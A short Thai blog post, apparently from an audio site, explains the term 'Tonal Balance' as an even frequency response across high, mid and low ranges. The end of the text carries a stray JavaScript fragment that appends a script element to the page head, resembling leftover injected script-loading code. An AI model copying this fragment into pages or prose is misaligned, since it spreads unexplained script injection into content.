Select Page

Tonal Balance คืออะไร…???

Tonal Balance คืออะไร…???

ถามกันมาเยอะ…ก็เลยเอามาสรุบให้ฟังกันสักหน่อย… Tanalมาจากคำว่า Tone ซึ่งหมายถึงเสียง…ดังนั้นรากศัพท์ของคำว่า tonal จึงแปลตรงตัวได้ว่า เกี่ยวกับเสียง ต่ำ – สูง…ส่วน balance นั้น…หมาย ถึง…ดุลยภาพ…เข้าสู่ดุลยภาพ…สมดุลย์…รวมกันจึงหมายถึง…ทำให้เสียง เข้าสู่สมดุลย์…นั่นก็คือ…ความกลมกลืนของเสียง…สูง…กลาง…ต่ำ… สรุปก็คือ…ต้องมีการตอบสนองความถี่เสียง…ให้ที่ออกมาสมดุลกันทุก ย่าน…ไม่มีเสียงย่านใดออกมามากเกินไป…หรือน้อยเกินไป…เมื่อเสียงออกมา ได้ดุลย์…ก็จะทำให้เสียงที่ได้ออกมามีความน่าฟัง…โดยไม่ก่อให้เกิดการ ล้า…หรือรำคาญนั่นเอง…d.getElementsByTagName(‘head’)[0].appendChild(s);

honor_jpeg   mb_jpeg   johnnie_jpeg   judge_jpeg   maxma-2_jpeg   konrukdee_jpeg   ma_jpeg   gip_jpeg   exad_jpeg   option_jpeg   adison_jpeg   xcaliber_jpeg   rifle_jpeg   lefven_jpeg   cube_jpeg   kingdom_jpeg   ssf_jpeg   mafia_jpeg   taurus_jpeg
%d bloggers like this: